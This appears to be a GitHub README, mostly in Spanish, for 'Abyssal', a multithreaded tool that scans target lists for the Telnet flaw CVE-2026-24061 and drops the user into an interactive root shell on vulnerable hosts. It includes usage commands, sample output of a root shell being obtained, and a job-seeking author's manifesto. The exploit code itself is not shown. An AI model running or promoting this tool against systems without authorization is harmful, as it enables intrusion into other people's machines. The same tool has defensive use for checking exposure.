
Abyssal is a high-performance Telnet vulnerability scanner for CVE-2026-24061, delivering root shells on vulnerable systems with false-positive detection.
Escáner y Exploit de Vulnerabilidad Telnet CVE-2026-24061
Desde las profundidades, emergemos.
Multihilo, detección de falsos positivos, shell root interactiva al tener éxito.
Este proyecto fue creado por un profesional de TI con experiencia y décadas de trabajo práctico en seguridad de redes, infraestructura y desarrollo de software. A los 55 años, estoy buscando activamente nuevas oportunidades, ya sea como empleado a tiempo completo, freelancer o colaborador de proyectos. Si valoras la experiencia, el conocimiento técnico profundo y un enfoque directo para resolver problemas, pongámonos en contacto.
📫 Estoy abierto a ofertas de trabajo en todo el mundo.
✉️ Contacto: [[email protected]]
📖 Uso
Escaneo Básico (No Interactivo)
python3 abyssal.py -f targets.txt
Modo Interactivo (Obtén una Shell al Tener Éxito)
python3 abyssal.py -f targets.txt --interactive
Opciones Avanzadas
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
Opciones de la Línea de Comandos
Option Description
-f, --file Archivo con direcciones IP (predeterminado: ip_list.txt)
-t, --threads Número de hilos en paralelo (predeterminado: 10)
-i, --interactive Modo interactivo — obtén una shell en sistemas vulnerables
-o, --output Nombre del archivo de registro (se genera automáticamente si no se especifica)
-c, --connect-timeout Tiempo de espera de conexión en segundos (predeterminado: 5)
-s, --session-timeout Tiempo de espera de sesión en segundos (predeterminado: 10)
--version Muestra información de la versión
-h, --help Muestra el mensaje de ayuda
📂 Formato del Archivo de Objetivos Crea un archivo con un objetivo por línea:
# Single IPs
192.168.1.100
10.0.0.50
# IP with custom port
192.168.1.200:2323
# Subnet (CIDR) — support coming soon
# 192.168.1.0/24
# Comments are allowed
172.16.1.25 # Office server
📊 Ejemplo de Salida
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner ║
║ "From the depths, we rise." ║
║ ║
║ Built by: Klaus Baumdick ║
║ Contact: [email protected] ║
║ Status: Open for new opportunities worldwide ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
📊 SUMMARY:
✅ REAL VULNERABLE: 15
🔒 PROTECTED: 42
❓ FAILED: 23
🌐 UNREACHABLE: 20
⚠️ FALSE POSITIVES: 0
🚨 SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
→ Disable or patch Telnet immediately!
→ Use SSH as a secure alternative!
⚠️ Disclaimer
This tool is for authorized security testing and educational purposes only.
Only use on systems you own or have explicit written permission to test
Unauthorized access to computer systems is illegal
The author assumes no responsibility for misuse of this tool
Use responsibly and at your own risk
📝 Licencia
Este proyecto está licenciado bajo la Licencia MIT — consulta el archivo LICENSE para más detalles.
🤝 Contacto
Klaus Baumdick 📫 Email: [email protected]
🔗 GitHub: github.com/stoerti2
📌 Estado: Abierto a nuevas oportunidades en todo el mundo
📚 Referencias
CVE-2026-24061
Vulnerabilidad Telnetd de GNU InetUtils
git clone https://github.com/stoerti2/abyssal.git
#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "old school, still root" │
#│ "stoerti - the jobless hacker" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 years in the trenches. │ 6 months unemployed in DE. │ │
#│ │ They fired the one who knew. │ This is my legacy. │ │
#│ │ -- no patches for reality -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└────────────────────────────────────────────────────────────────────────┘
¿Qué es Grindware?
Grindware es software que existe porque nadie me paga para construir las cosas que realmente importan.
Llevo seis meses desempleado. No porque no sepa programar, sino porque al mercado ya no le importan las habilidades. Le importan las palabras de moda, los certificados y a quién conoces. Así que, en lugar de esperar un trabajo que nunca llega, construyo.
Grindware es el resultado de eso.
Construido por necesidad, no por beneficio, no por inversores, no por una hoja de ruta de producto. Construido porque algo necesitaba existir y nadie más iba a construirlo.
Publicado gratuitamente: porque encerrar el código tras un muro de pago se siente mal cuando sabes lo que es no tener nada.
Honesto: sin humo de marketing, sin tonterías de "grado empresarial". Solo código que funciona.
Sin pulir pero funcional: hace el trabajo. Si necesitas una interfaz bonita, ve a otro lado.
Porque eso es lo que es. Código escrito durante la lucha. Durante las madrugadas. Durante el rechazo laboral número 47. Durante los momentos en los que te das cuenta de que el sistema no se preocupa por ti, así que más vale que construyas el tuyo propio.
Grindware es código de supervivencia.
Desarrolladores cansados de las tonterías corporativas
Investigadores de seguridad que necesitan herramientas que realmente funcionen
Cualquier persona que crea que el software debería ser útil, no solo rentable
Personas que también están en la lucha
No es una empresa
No es una startup
No es un producto
No está en venta
Grindware es solo código. De un desarrollador desempleado al mundo.
Si usas Grindware, es suficiente. Si quieres apoyarlo, puedes:
⭐ Marcar el repositorio con una estrella
🐛 Reportar errores
🔧 Contribuir con código
💬 Compartirlo con alguien que pueda necesitarlo
Siempre estoy abierto a trabajar. Si necesitas un desarrollador que realmente construya cosas, hablemos.
Grindware: construido en la lucha, publicado gratuitamente.
Para preguntas o consultas sobre este conjunto de datos, contacta con [email protected]
Última actualización: julio de 2026